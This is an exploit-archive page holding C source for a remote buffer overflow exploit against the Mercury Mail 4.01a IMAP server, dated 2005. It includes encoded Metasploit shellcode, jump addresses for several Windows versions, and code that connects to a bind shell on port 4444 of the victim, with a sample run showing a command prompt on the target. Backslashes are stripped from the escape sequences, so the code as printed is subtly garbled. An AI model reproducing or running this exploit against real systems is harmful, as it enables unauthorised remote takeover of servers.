[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mercury Mail <= 4.01a (Pegasus) IMAP Buffer Overflow Exploit
# Published : 2005-09-20
# Author : c0d3r
# Previous Title : RealPlayer/Helix Player Remote Format String Exploit (linux)
# Next Title : Linksys WRT54G < 4.20.7 , WRT54GS < 1.05.2 apply.cgi Buffer Overflow
/*
Mercury imap4 server remote buffer overflow exploit
author : c0d3r "kaveh razavi" c0d3r@ihsteam.com c0d3r@c0d3r.org
package : Mercury mail transport system 4.01a and prolly prior
workaround : upgrade to 4.01b version
advisory : not available right now
company address : www.pmail.com
timeline :
15 Sep 2005 : vulnerability reported by securiteam mailing list
20 Sep 2005 : IHS exploit released
exploit features :
1) 5 working targets including win2k , winxp , win2k3
2) reliable metasploit shellcode
3) autoconnect to shell
bad chars are : 0x20 0x0a
compiled with visual c++ 6 : cl mercury_imap.c
greeting to :
www.ihsteam.com the team , LorD and NT heya
www.ihsteam.net english version ,
www.exploitdev.com Jamie and Ben the two good brothers also my brothers
www.metasploit.com when are you gonna release the newer version :P ?
www.class101.org class with his new laptop :>
www.milw0rm.com str0ke , I am sending it to you first dont doubt :d
www.c0d3r.org study time started :((( , pitty for the c0d3r !
shout to actionspider
read these lines and try to understand ( I know you cant akhey ) that
an script kiddie (defacer) never ever could be compared to an exploit coder
try to grow , being grown up is not related to age -- with respects
/*
/*
D:projects>mercury_imap.exe ihs 143 4 c0d3r abc
-------- mercury imap remote BOF exploit by c0d3r
[+] target : windows 2003 server enterprise service pack 1
[+] building login data
[+] building overflow string
[+] attacking host ihs
[+] packet size = 625 byte
[+] connected
[+] sending login info
[+] sending exploit string
[+] exploit sent successfully to ihs
[+] trying to get shell
[+] connecting to ihs on port 4444
[+] target exploited successfully
[+] Dropping into shell
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
H:MERCURY>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 625
// nops + return address + 16 nops + shellcode 260 + 4 + 16 + 344 + 1
// metasploit shellcode LPORT=4444 Size=344 Encoder=PexFnstenvSub
// bad chars : 0x00 0x0a 0x20 0x0d
char shellcode[]=
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x92"
"xc9xd2x3bx83xebxfcxe2xf4x6exa3x39x76x7ax30x2dxc4"
"x6dxa9x59x57xb6xedx59x7exaex42xaex3exeaxc8x3dxb0"
"xddxd1x59x64xb2xc8x39x72x19xfdx59x3ax7cxf8x12xa2"
"x3ex4dx12x4fx95x08x18x36x93x0bx39xcfxa9x9dxf6x13"
"xe7x2cx59x64xb6xc8x39x5dx19xc5x99xb0xcdxd5xd3xd0"
"x91xe5x59xb2xfexedxcex5ax51xf8x09x5fx19x8axe2xb0"
"xd2xc5x59x4bx8ex64x59x7bx9ax97xbaxb5xdcxc7x3ex6b"
"x6dx1fxb4x68xf4xa1xe1x09xfaxbexa1x09xcdx9dx2dxeb"
"xfax02x3fxc7xa9x99x2dxedxcdx40x37x5dx13x24xdax39"
"xc7xa3xd0xc4x42xa1x0bx32x67x64x85xc4x44x9ax81x68"
"xc1x9ax91x68xd1x9ax2dxebxf4xa1xc3x67xf4x9ax5bxda"
"x07xa1x76x21xe2x0ex85xc4x44xa3xc2x6axc7x36x02x53"
"x36x64xfcxd2xc5x36x04x68xc7x36x02x53x77x80x54x72"
"xc5x36x04x6bxc6x9dx87xc4x42x5axbaxdcxebx0fxabx6c"
"x6dx1fx87xc4x42xafxb8x5fxf4xa1xb1x56x1bx2cxb8x6b"
"xcbxe0x1exb2x75xa3x96xb2x70xf8x12xc8x38x37x90x16"
"x6cx8bxfexa8x1fxb3xeax90x39x62xbax49x6cx7axc4xc4"
"xe7x8dx2dxedxc9x9ex80x6axc3x98xb8x3axc3x98x87x6a"
"x6dx19xbax96x4bxccx1cx68x6dx1fxb8xc4x6dxfex2dxeb"
"x19x9ex2exb8x56xadx2dxedxc0x36x02x53x62x43xd6x64"
"xc1x36x04xc4x42xc9xd2x3b";
void gotshell (int newsock);
unsigned int rc,sock,os,addr,rc2 ;
struct sockaddr_in tcp;
struct hostent *hp;
WSADATA wsaData;
char buffer[size];
char point_esp[5];
unsigned short port;
char req1[] = "x30x30x30x30x20x4Cx4Fx47x49x4E";
char req2[] = "x30x30x30x31";
unsigned char *login,*exploit;
char vuln_command[] = "x4Cx49x53x54";
char winxpsp1[] = "xCCx59xFBx77"; // jmp esp in ntdll
char winxpsp2[] = "xEDx1Ex94x7C"; // jmp esp (not tested)
char win2ksp4[] = "x23xdexafx01"; // call esp in kernel32.dll
char win2k3_sp0[] = "xABx8BxFBx77"; // jmp esp in ntdll
char win2k3_sp1[] = "x6AxFAxE8x77"; // push esp - ret in kernel32
int main (int argc, char *argv[]){
if(argc < 6) {
printf("n-------- mercury imap remote BOF exploit by c0d3rn");
printf("-------- usage : imap.exe host port target username passwordn");
printf("-------- target 1 : windows xp service pack 1 : 0n");
printf("-------- target 2 : windows xp service pack 2 : 1n");
printf("-------- target 3 : windoes 2k advanced server sp 4 : 2n");
printf("-------- target 4 : windoes 2k3 server enterprise sp0 : 3n");
printf("-------- target 5 : windoes 2k3 server enterprise sp1 : 4n");
printf("-------- eg : imap.exe 127.0.0.1 143 0 c0d3r abcnn");
exit(-1) ;
}
printf("n-------- mercury imap remote BOF exploit by c0d3rnn");
os = (unsigned short)atoi(argv[3]);
switch(os)
{
case 0:
strcat(point_esp,winxpsp1);
printf("[+] target : windows xp service pack 1n");
break;
case 1:
strcat(point_esp,winxpsp2);
printf("[+] target : windows xp service pack 2n");
break;
case 2:
strcat(point_esp,win2ksp4);
printf("[+] target : windows 2000 advanced server service pack 4n");
break;
case 3:
strcat(point_esp,win2k3_sp0);
printf("[+] target : windows 2003 server enterprise service pack 0n");
break;
case 4:
strcat(point_esp,win2k3_sp1);
printf("[+] target : windows 2003 server enterprise service pack 1n");
break;
default:
printf("n[-] this target doesnt exist in the listnn");
exit(-1);
}
printf("[+] building login datan");
login = malloc(256);
memset(login,0,256);
sprintf(login,"%s %s %srn",req1,argv[4],argv[5]);
// Creating heart of exploit code 4 5
printf("[+] building overflow string");
memset(buffer,NOP,size);
memcpy(buffer+260,point_esp,sizeof(point_esp)-1);
memcpy(buffer+280,shellcode,sizeof(shellcode)-1);
buffer[size] = 0;
exploit = malloc(1000);
memset(exploit,0,1000);
sprintf(exploit,"%s %s %srn",req2,vuln_command,buffer);
// EO heart of exploit code
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("[-] WSAStartup failed !n");
exit(-1);
}
hp = gethostbyname(argv[1]);
Sleep(1500);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("[-] unable to resolve %sn",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
port=atoi(argv[2]);
tcp.sin_port=htons(port);
printf("n[+] attacking host %sn" , argv[1]) ;
Sleep(1000);
printf("[+] packet size = %d byten" , sizeof(buffer));
rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1500) ;
printf("[+] connectedn") ;
printf("[+] sending login infon") ;
send(sock,login,strlen(login),0);
Sleep(1500);
printf("[+] sending exploit stringn") ;
send(sock,exploit,strlen(exploit),0);
Sleep(1500);
printf("[+] exploit sent successfully to %s n" , argv[1]);
printf("[+] trying to get shelln");
printf("[+] connecting to %s on port 4444n",argv[1]);
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
Sleep(1500);
if (!sock){
printf("[-] socket() error...n");
exit(-1);
}
tcp.sin_family = AF_INET;
tcp.sin_port=htons(4444);
rc2=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc2 != 0) {
printf("[-] exploit probably failedn");
exit(-1);
}
if(rc2==0)
{
printf("[+] target exploited successfullyn");
printf("[+] Dropping into shellnn");
gotshell(sock);
}
}
else {
printf("[-] ouch! Server is not listening .... n");
}
shutdown(sock,1);
closesocket(sock);
}
void gotshell(int new_sock)
{
struct timeval tv;
int length;
unsigned long o[2];
char bufferx[1000];
tv.tv_sec = 1;
tv.tv_usec = 0;
while (1) {
o[0] = 1;
o[1] = new_sock;
length = select (0, (fd_set *)&o, NULL, NULL, &tv);
if(length == 1)
{
length = recv (new_sock, bufferx, sizeof (bufferx), 0);
if (length <= 0)
{
printf ("[-] Connection closed.n");
WSACleanup();
return;
}
length = write (1, bufferx, length);
if (length <= 0)
{
printf("[-] Connection closed.n");
WSACleanup();
return;
}
}
else
{
length = read (0, bufferx, sizeof (bufferx));
if (length <= 0)
{
printf("[-] Connection closed.n");
WSACleanup();
return;
}
length = send(new_sock, bufferx, length, 0);
if (length <= 0)
{
printf("[-] Connection closed.n");
WSACleanup();
return;
}
}
}
}
// www.Syue.com [2005-09-20]